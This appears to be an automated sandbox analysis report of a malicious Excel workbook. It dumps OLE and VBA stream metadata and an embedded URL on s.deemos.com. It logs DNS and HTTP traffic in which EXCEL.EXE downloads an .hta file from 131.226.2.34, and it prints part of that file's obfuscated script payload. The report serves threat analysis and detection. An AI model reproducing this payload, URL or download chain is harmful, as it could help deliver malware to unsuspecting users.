                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , D . . . . . . . . . . + , . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 00 00 00 05 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 20 02 00 00 dc 01 00 00 14 00 00 00 01 00 00 00 a8 00 00 00 02 00 00 00 b0 00 00 00 03 00 00 00 bc 00 00 00 0e 00 00 00 c8 00 00 00 0f 00 00 00 d4 00 00 00 04 00 00 00 e0 00 00 00 05 00 00 00
                          General
                          Stream Path:MBD00438E0F/MBD000846C9/\x5SummaryInformation
                          CLSID:
                          File Type:data
                          Stream Size:372
                          Entropy:2.913345911478729
                          Base64 Encoded:True
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . , . . . . . . . 4 . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v i v i e n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 1
                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 44 01 00 00 10 00 00 00 01 00 00 00 88 00 00 00 02 00 00 00 90 00 00 00 03 00 00 00 9c 00 00 00 04 00 00 00 a8 00 00 00 05 00 00 00 b8 00 00 00 06 00 00 00 c4 00 00 00 07 00 00 00 d0 00 00 00 08 00 00 00 dc 00 00 00 09 00 00 00 ec 00 00 00
                          General
                          Stream Path:MBD00438E0F/MBD000846C9/Workbook
                          CLSID:
                          File Type:Applesoft BASIC program data, first line number 16
                          Stream Size:97808
                          Entropy:7.365095307579232
                          Base64 Encoded:True
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . 9 1 9 7 4 B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . P . 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . . .
                          Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c9 00 02 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 39 31 39 37 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                          General
                          Stream Path:MBD00438E0F/MBD0018D4CE/\x1Ole
                          CLSID:
                          File Type:data
                          Stream Size:20
                          Entropy:0.5689955935892812
                          Base64 Encoded:False
                          Data ASCII:. . . . . . . . . . . . . . . . . . . .
                          Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          General
                          Stream Path:MBD00438E0F/MBD0018D4CE/\x3ObjInfo
                          CLSID:
                          File Type:data
                          Stream Size:4
                          Entropy:0.8112781244591328
                          Base64 Encoded:False
                          Data ASCII:. . . .
                          Data Raw:00 00 03 00
                          General
                          Stream Path:MBD00438E0F/MBD0018D4CE/Contents
                          CLSID:
                          File Type:Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
                          Stream Size:197671
                          Entropy:6.989042939766534
                          Base64 Encoded:True
                          Data ASCII:C P T 9 F I L E . . . . . . . . . . . . . . . . 8 . 8 . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                          Data Raw:43 50 54 39 46 49 4c 45 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 38 b4 00 d0 38 b4 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 01 00 94 00 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          General
                          Stream Path:MBD00438E0F/Workbook
                          CLSID:
                          File Type:Applesoft BASIC program data, first line number 16
                          Stream Size:386813
                          Entropy:7.815032759709734
                          Base64 Encoded:True
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . ` < x - 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . . . . .
                          Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                          General
                          Stream Path:MBD00438E10/\x1Ole
                          CLSID:
                          File Type:data
                          Stream Size:774
                          Entropy:4.473804902961029
                          Base64 Encoded:False
                          Data ASCII:. . . . . $ C . 6 . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . s . . . d . e . e . m . o . s . . . c . o . m . / . h . A . N . T . n . N . H . 4 . ? . & . a . s . t . r . o . l . o . g . y . = . w . e . t . . & . a . b . o . l . i . s . h . m . e . n . t . = . s . c . i . n . t . i . l . l . a . t . i . n . g . & . p . a . v . e . m . e . n . t . . . . t S A f S . . M . ~ H 8 K . K G < . . . a ; . . T c . . . . . . . . . . . . . . . . . . . K . V . d . h . D . Y . i . P
                          Data Raw:01 00 00 02 8f b5 d7 1e 24 43 04 36 00 00 00 00 00 00 00 00 00 00 00 00 cc 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b c8 00 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 73 00 2e 00 64 00 65 00 65 00 6d 00 6f 00 73 00 2e 00 63 00 6f 00 6d 00 2f 00 68 00 41 00 4e 00 54 00 6e 00 4e 00 48 00 34 00 3f 00 26 00 61 00 73 00 74 00 72 00 6f 00 6c 00 6f 00 67 00 79 00
                          General
                          Stream Path:Workbook
                          CLSID:
                          File Type:Applesoft BASIC program data, first line number 16
                          Stream Size:434913
                          Entropy:7.99909358593359
                          Base64 Encoded:True
                          Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . W . / . m . ~ t B W . . L ` % . . E . j . O } ' . 9 . . . . z . . . . . . . + . . . \\ . p . $ \\ . , . b . u ~ D ^ . { . W K f D . . . N 0 U p N . | . w . . . . / m . X ( b > l 5 j _ . # _ . y > @ i % . S . h % B . . . ; . a . . . . . . = . . . ' : - . . . . . < . $ : [ . . 7 . . . . P . . . . . . . . . . . . . . . . . s . . . . = . . . [ / _ . f l . ] @ . . . . . . . " . . . d b . . . . ( @ . . . ) . . . . 1 . . . . V M . V . J q r . l J . H . 4 1 .
                          Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 ed 81 57 15 a8 2f 0b 6d 0c 7e ff d8 74 42 97 57 1c 84 0e 4c e0 c7 ff 60 25 1e c7 05 45 1e e0 6a e7 1f 4f 7d a3 27 0c b3 39 0f 0c fe bb 12 10 7a e1 00 02 00 b0 04 c1 00 02 00 2b bb e2 00 00 00 5c 00 70 00 ae 24 87 fc 5c dc c0 0b 2c 06 62 e4 f1 10 bf de 75 7e 44 b3 d1 ce 5e 88 01 7b ed 90 1f 93
                          General
                          Stream Path:_VBA_PROJECT_CUR/PROJECT
                          CLSID:
                          File Type:ASCII text, with CRLF line terminators
                          Stream Size:517
                          Entropy:5.254364355809256
                          Base64 Encoded:True
                          Data ASCII:I D = " { 5 A 4 3 9 5 4 8 - D A 3 A - 4 5 4 1 - 8 1 6 8 - D F 2 B D A B 8 D 0 5 C } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " C 9 C B 2 3 B 1 2 7 B 1 2 7 B 1 2
                          Data Raw:49 44 3d 22 7b 35 41 34 33 39 35 34 38 2d 44 41 33 41 2d 34 35 34 31 2d 38 31 36 38 2d 44 46 32 42 44 41 42 38 44 30 35 43 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                          General
                          Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                          CLSID:
                          File Type:data
                          Stream Size:104
                          Entropy:3.0488640812019017
                          Base64 Encoded:False
                          Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                          Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                          CLSID:
                          File Type:data
                          Stream Size:2644
                          Entropy:3.99712025135722
                          Base64 Encoded:False
                          Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                          Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/dir
                          CLSID:
                          File Type:data
                          Stream Size:553
                          Entropy:6.3759657298043875
                          Base64 Encoded:True
                          Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . ] i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E
                          Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 5d af 99 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                          TimestampSource PortDest PortSource IPDest IP
                          Jan 14, 2025 19:22:36.641205072 CET49753443192.168.2.414.103.79.10
                          Jan 14, 2025 19:22:36.641295910 CET4434975314.103.79.10192.168.2.4
                          Jan 14, 2025 19:22:36.641386032 CET49753443192.168.2.414.103.79.10
                          Jan 14, 2025 19:22:36.641613007 CET49753443192.168.2.414.103.79.10
                          Jan 14, 2025 19:22:36.641666889 CET4434975314.103.79.10192.168.2.4
                          Jan 14, 2025 19:22:37.578934908 CET4434975314.103.79.10192.168.2.4
                          Jan 14, 2025 19:22:37.579142094 CET49753443192.168.2.414.103.79.10
                          Jan 14, 2025 19:22:37.590312004 CET49753443192.168.2.414.103.79.10
                          Jan 14, 2025 19:22:37.590343952 CET4434975314.103.79.10192.168.2.4
                          Jan 14, 2025 19:22:37.590760946 CET4434975314.103.79.10192.168.2.4
                          Jan 14, 2025 19:22:37.590903997 CET49753443192.168.2.414.103.79.10
                          Jan 14, 2025 19:22:37.593682051 CET49753443192.168.2.414.103.79.10
                          Jan 14, 2025 19:22:37.635406017 CET4434975314.103.79.10192.168.2.4
                          Jan 14, 2025 19:22:38.109042883 CET4434975314.103.79.10192.168.2.4
                          Jan 14, 2025 19:22:38.109121084 CET4434975314.103.79.10192.168.2.4
                          Jan 14, 2025 19:22:38.109129906 CET49753443192.168.2.414.103.79.10
                          Jan 14, 2025 19:22:38.109354019 CET49753443192.168.2.414.103.79.10
                          Jan 14, 2025 19:22:38.112302065 CET49753443192.168.2.414.103.79.10
                          Jan 14, 2025 19:22:38.112318039 CET4434975314.103.79.10192.168.2.4
                          Jan 14, 2025 19:22:38.114012003 CET4975580192.168.2.4131.226.2.34
                          Jan 14, 2025 19:22:38.118931055 CET8049755131.226.2.34192.168.2.4
                          Jan 14, 2025 19:22:38.119031906 CET4975580192.168.2.4131.226.2.34
                          Jan 14, 2025 19:22:38.119146109 CET4975580192.168.2.4131.226.2.34
                          Jan 14, 2025 19:22:38.123954058 CET8049755131.226.2.34192.168.2.4
                          Jan 14, 2025 19:22:38.621881962 CET8049755131.226.2.34192.168.2.4
                          Jan 14, 2025 19:22:38.621941090 CET8049755131.226.2.34192.168.2.4
                          Jan 14, 2025 19:22:38.621968031 CET4975580192.168.2.4131.226.2.34
                          Jan 14, 2025 19:22:38.621975899 CET8049755131.226.2.34192.168.2.4
                          Jan 14, 2025 19:22:38.622009039 CET8049755131.226.2.34192.168.2.4
                          Jan 14, 2025 19:22:38.622044086 CET8049755131.226.2.34192.168.2.4
                          Jan 14, 2025 19:22:38.622051954 CET4975580192.168.2.4131.226.2.34
                          Jan 14, 2025 19:22:38.622051954 CET4975580192.168.2.4131.226.2.34
                          Jan 14, 2025 19:22:38.622051954 CET4975580192.168.2.4131.226.2.34
                          Jan 14, 2025 19:22:38.622077942 CET8049755131.226.2.34192.168.2.4
                          Jan 14, 2025 19:22:38.622107029 CET4975580192.168.2.4131.226.2.34
                          Jan 14, 2025 19:22:38.622112036 CET8049755131.226.2.34192.168.2.4
                          Jan 14, 2025 19:22:38.622129917 CET4975580192.168.2.4131.226.2.34
                          Jan 14, 2025 19:22:38.622145891 CET8049755131.226.2.34192.168.2.4
                          Jan 14, 2025 19:22:38.622165918 CET4975580192.168.2.4131.226.2.34
                          Jan 14, 2025 19:22:38.622179985 CET8049755131.226.2.34192.168.2.4
                          Jan 14, 2025 19:22:38.622189999 CET4975580192.168.2.4131.226.2.34
                          Jan 14, 2025 19:22:38.622215033 CET8049755131.226.2.34192.168.2.4
                          Jan 14, 2025 19:22:38.622263908 CET4975580192.168.2.4131.226.2.34
                          Jan 14, 2025 19:22:38.622263908 CET4975580192.168.2.4131.226.2.34
                          Jan 14, 2025 19:22:38.627101898 CET8049755131.226.2.34192.168.2.4
                          Jan 14, 2025 19:22:38.627137899 CET8049755131.226.2.34192.168.2.4
                          Jan 14, 2025 19:22:38.627160072 CET4975580192.168.2.4131.226.2.34
                          Jan 14, 2025 19:22:38.627197981 CET4975580192.168.2.4131.226.2.34
                          Jan 14, 2025 19:22:38.627243042 CET8049755131.226.2.34192.168.2.4
                          Jan 14, 2025 19:22:38.627293110 CET4975580192.168.2.4131.226.2.34
                          Jan 14, 2025 19:22:38.710397005 CET8049755131.226.2.34192.168.2.4
                          Jan 14, 2025 19:22:38.710479975 CET4975580192.168.2.4131.226.2.34
                          Jan 14, 2025 19:22:38.710510969 CET8049755131.226.2.34192.168.2.4
                          Jan 14, 2025 19:22:38.710547924 CET8049755131.226.2.34192.168.2.4
                          Jan 14, 2025 19:22:38.710566044 CET4975580192.168.2.4131.226.2.34
                          Jan 14, 2025 19:22:38.710585117 CET8049755131.226.2.34192.168.2.4
                          Jan 14, 2025 19:22:38.710611105 CET4975580192.168.2.4131.226.2.34
                          Jan 14, 2025 19:22:38.710618973 CET8049755131.226.2.34192.168.2.4
                          Jan 14, 2025 19:22:38.710634947 CET4975580192.168.2.4131.226.2.34
                          Jan 14, 2025 19:22:38.710652113 CET8049755131.226.2.34192.168.2.4
                          Jan 14, 2025 19:22:38.710665941 CET4975580192.168.2.4131.226.2.34
                          Jan 14, 2025 19:22:38.710688114 CET8049755131.226.2.34192.168.2.4
                          Jan 14, 2025 19:22:38.710701942 CET4975580192.168.2.4131.226.2.34
                          Jan 14, 2025 19:22:38.710721970 CET8049755131.226.2.34192.168.2.4
                          Jan 14, 2025 19:22:38.710731983 CET4975580192.168.2.4131.226.2.34
                          Jan 14, 2025 19:22:38.710773945 CET4975580192.168.2.4131.226.2.34
                          Jan 14, 2025 19:22:38.711244106 CET8049755131.226.2.34192.168.2.4
                          Jan 14, 2025 19:22:38.711294889 CET8049755131.226.2.34192.168.2.4
                          Jan 14, 2025 19:22:38.711302996 CET4975580192.168.2.4131.226.2.34
                          Jan 14, 2025 19:22:38.711349010 CET8049755131.226.2.34192.168.2.4
                          Jan 14, 2025 19:22:38.711349010 CET4975580192.168.2.4131.226.2.34
                          Jan 14, 2025 19:22:38.711381912 CET8049755131.226.2.34192.168.2.4
                          Jan 14, 2025 19:22:38.711395979 CET4975580192.168.2.4131.226.2.34
                          Jan 14, 2025 19:22:38.711417913 CET8049755131.226.2.34192.168.2.4
                          Jan 14, 2025 19:22:38.711432934 CET4975580192.168.2.4131.226.2.34
                          Jan 14, 2025 19:22:38.711472988 CET4975580192.168.2.4131.226.2.34
                          Jan 14, 2025 19:22:38.712006092 CET8049755131.226.2.34192.168.2.4
                          Jan 14, 2025 19:22:38.712057114 CET8049755131.226.2.34192.168.2.4
                          Jan 14, 2025 19:22:38.712059021 CET4975580192.168.2.4131.226.2.34
                          Jan 14, 2025 19:22:38.712091923 CET8049755131.226.2.34192.168.2.4
                          Jan 14, 2025 19:22:38.712111950 CET4975580192.168.2.4131.226.2.34
                          Jan 14, 2025 19:22:38.712124109 CET8049755131.226.2.34192.168.2.4
                          Jan 14, 2025 19:22:38.712137938 CET4975580192.168.2.4131.226.2.34
                          Jan 14, 2025 19:22:38.712158918 CET8049755131.226.2.34192.168.2.4
                          Jan 14, 2025 19:22:38.712167978 CET4975580192.168.2.4131.226.2.34
                          Jan 14, 2025 19:22:38.712214947 CET4975580192.168.2.4131.226.2.34
                          Jan 14, 2025 19:22:38.712932110 CET8049755131.226.2.34192.168.2.4
                          Jan 14, 2025 19:22:38.712964058 CET8049755131.226.2.34192.168.2.4
                          Jan 14, 2025 19:22:38.712987900 CET4975580192.168.2.4131.226.2.34
                          Jan 14, 2025 19:22:38.712999105 CET8049755131.226.2.34192.168.2.4
                          Jan 14, 2025 19:22:38.713007927 CET4975580192.168.2.4131.226.2.34
                          Jan 14, 2025 19:22:38.713032007 CET8049755131.226.2.34192.168.2.4
                          Jan 14, 2025 19:22:38.713048935 CET4975580192.168.2.4131.226.2.34
                          Jan 14, 2025 19:22:38.713068008 CET8049755131.226.2.34192.168.2.4
                          Jan 14, 2025 19:22:38.713084936 CET4975580192.168.2.4131.226.2.34
                          Jan 14, 2025 19:22:38.713109970 CET4975580192.168.2.4131.226.2.34
                          Jan 14, 2025 19:22:38.715640068 CET8049755131.226.2.34192.168.2.4
                          Jan 14, 2025 19:22:38.715675116 CET8049755131.226.2.34192.168.2.4
                          Jan 14, 2025 19:22:38.715696096 CET4975580192.168.2.4131.226.2.34
                          Jan 14, 2025 19:22:38.715728998 CET4975580192.168.2.4131.226.2.34
                          Jan 14, 2025 19:22:38.802234888 CET8049755131.226.2.34192.168.2.4
                          Jan 14, 2025 19:22:38.802272081 CET8049755131.226.2.34192.168.2.4
                          Jan 14, 2025 19:22:38.802305937 CET8049755131.226.2.34192.168.2.4
                          Jan 14, 2025 19:22:38.802316904 CET4975580192.168.2.4131.226.2.34
                          Jan 14, 2025 19:22:38.802316904 CET4975580192.168.2.4131.226.2.34
                          Jan 14, 2025 19:22:38.802340031 CET8049755131.226.2.34192.168.2.4
                          Jan 14, 2025 19:22:38.802407026 CET4975580192.168.2.4131.226.2.34
                          Jan 14, 2025 19:22:38.802407026 CET4975580192.168.2.4131.226.2.34
                          Jan 14, 2025 19:22:38.856750011 CET4975580192.168.2.4131.226.2.34
                          Jan 14, 2025 19:22:38.856810093 CET4975580192.168.2.4131.226.2.34
                          TimestampSource PortDest PortSource IPDest IP
                          Jan 14, 2025 19:22:36.308692932 CET5149353192.168.2.41.1.1.1
                          Jan 14, 2025 19:22:36.640424967 CET53514931.1.1.1192.168.2.4
                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Jan 14, 2025 19:22:36.308692932 CET192.168.2.41.1.1.10x885cStandard query (0)s.deemos.comA (IP address)IN (0x0001)false
                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Jan 14, 2025 19:21:47.399665117 CET1.1.1.1192.168.2.40x7cd6No error (0)svc.ha-teams.office.comsvc.ms-acdc-teams.office.comCNAME (Canonical name)IN (0x0001)false
                          Jan 14, 2025 19:21:47.399665117 CET1.1.1.1192.168.2.40x7cd6No error (0)svc.ms-acdc-teams.office.com52.123.243.91A (IP address)IN (0x0001)false
                          Jan 14, 2025 19:21:47.399665117 CET1.1.1.1192.168.2.40x7cd6No error (0)svc.ms-acdc-teams.office.com52.123.243.72A (IP address)IN (0x0001)false
                          Jan 14, 2025 19:21:47.399665117 CET1.1.1.1192.168.2.40x7cd6No error (0)svc.ms-acdc-teams.office.com52.123.243.195A (IP address)IN (0x0001)false
                          Jan 14, 2025 19:21:47.399665117 CET1.1.1.1192.168.2.40x7cd6No error (0)svc.ms-acdc-teams.office.com52.123.243.80A (IP address)IN (0x0001)false
                          Jan 14, 2025 19:21:49.068559885 CET1.1.1.1192.168.2.40x945fNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                          Jan 14, 2025 19:21:49.068559885 CET1.1.1.1192.168.2.40x945fNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                          Jan 14, 2025 19:22:36.640424967 CET1.1.1.1192.168.2.40x885cNo error (0)s.deemos.com14.103.79.10A (IP address)IN (0x0001)false
                          Jan 14, 2025 19:22:37.614728928 CET1.1.1.1192.168.2.40x4916No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                          Jan 14, 2025 19:22:37.614728928 CET1.1.1.1192.168.2.40x4916No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                          • s.deemos.com
                          • 131.226.2.34
                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.449755131.226.2.34807636C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                          TimestampBytes transferredDirectionData
                          Jan 14, 2025 19:22:38.119146109 CET246OUTGET /xampp/meno/clearpciturewithhersheisverybeautifulgirl.hta HTTP/1.1
                          Accept: */*
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                          Connection: Keep-Alive
                          Host: 131.226.2.34
                          Jan 14, 2025 19:22:38.621881962 CET1236INHTTP/1.1 200 OK
                          Date: Tue, 14 Jan 2025 18:22:38 GMT
                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                          Last-Modified: Tue, 14 Jan 2025 07:35:34 GMT
                          ETag: "bac5-62ba59b3de18c"
                          Accept-Ranges: bytes
                          Content-Length: 47813
                          Keep-Alive: timeout=5, max=100
                          Connection: Keep-Alive
                          Content-Type: application/hta
                          Data Raw: 3c 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 76 61 72 20 64 20 3d 20 75 6e 65 73 63 61 70 65 28 22 25 33 35 25 33 32 25 33 31 25 33 36 25 33 34 25 33 34 25 33 39 25 33 36 25 33 30 25 33 32 25 36 32 25 36 34 25 33 37 25 33 30 25 36 31 25 33 36 25 32 30 25 36 34 25 32 38 25 33 33 25 32 37 25 33 38 25 33 64 25 33 34 25 32 39 25 36 33 25 34 63 25 35 38 25 35 31 25 35 30 25 32 32 25 30 61 25 32 30 25 35 31 25 34 39 25 35 38 25 34 35 25 36 33 25 34 63 25 35 38 25 35 38 25 35 34 25 37 30 25 34 39 25 35 35 25 35 39 25 34 64 25 35 61 25 32 31 25 36 35 25 33 63 25 37 30 25 33 39 25 32 35 25 37 30 25 32 37 25 35 33 25 35 31 25 35 34 25 34 35 25 35 38 25 34 64 25 34 36 25 35 30 25 34 39 25 36 35 25 36 33 25 34 37 25 35 33 25 35 32 25 35 38 25 34 39 25 35 32 25 35 38 25 32 31 25 36 35 25 32 64 25 32 39 25 32 31 25 32 39 25 35 31 25 35 39 25 35 30 25 34 35 25 35 38 25 34 39 25 32 64 25 32 39 25 37 62 25 36 35 25 36 33 25 32 32 25 30 61 25 32 30 25 34 63 [TRUNCATED]
                          Data Ascii: <script>...(function() { var d = unescape("%35%32%31%36%34%34%39%36%30%32%62%64%37%30%61%36%20%64%28%33%27%38%3d%34%29%63%4c%58%51%50%22%0a%20%51%49%58%45%63%4c%58%58%54%70%49%55%59%4d%5a%21%65%3c%70%39%25%70%27%53%51%54%45%58%4d%46%50%49%65%63%47%53%52%58%49%52%58%21%65%2d%29%21%29%51%59%50%45%58%49%2d%29%7b%65%63%22%0a%20%4c%58%51%50%22%0a%20%46%53%48%5d%22%0a%20%57%27%56%2d%54%38%63%38%3d%54%49%21%65%58%49%5c%38%72%5a%26%37%27%56%2d%34%38%65%22%0a%28%4d%31%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%
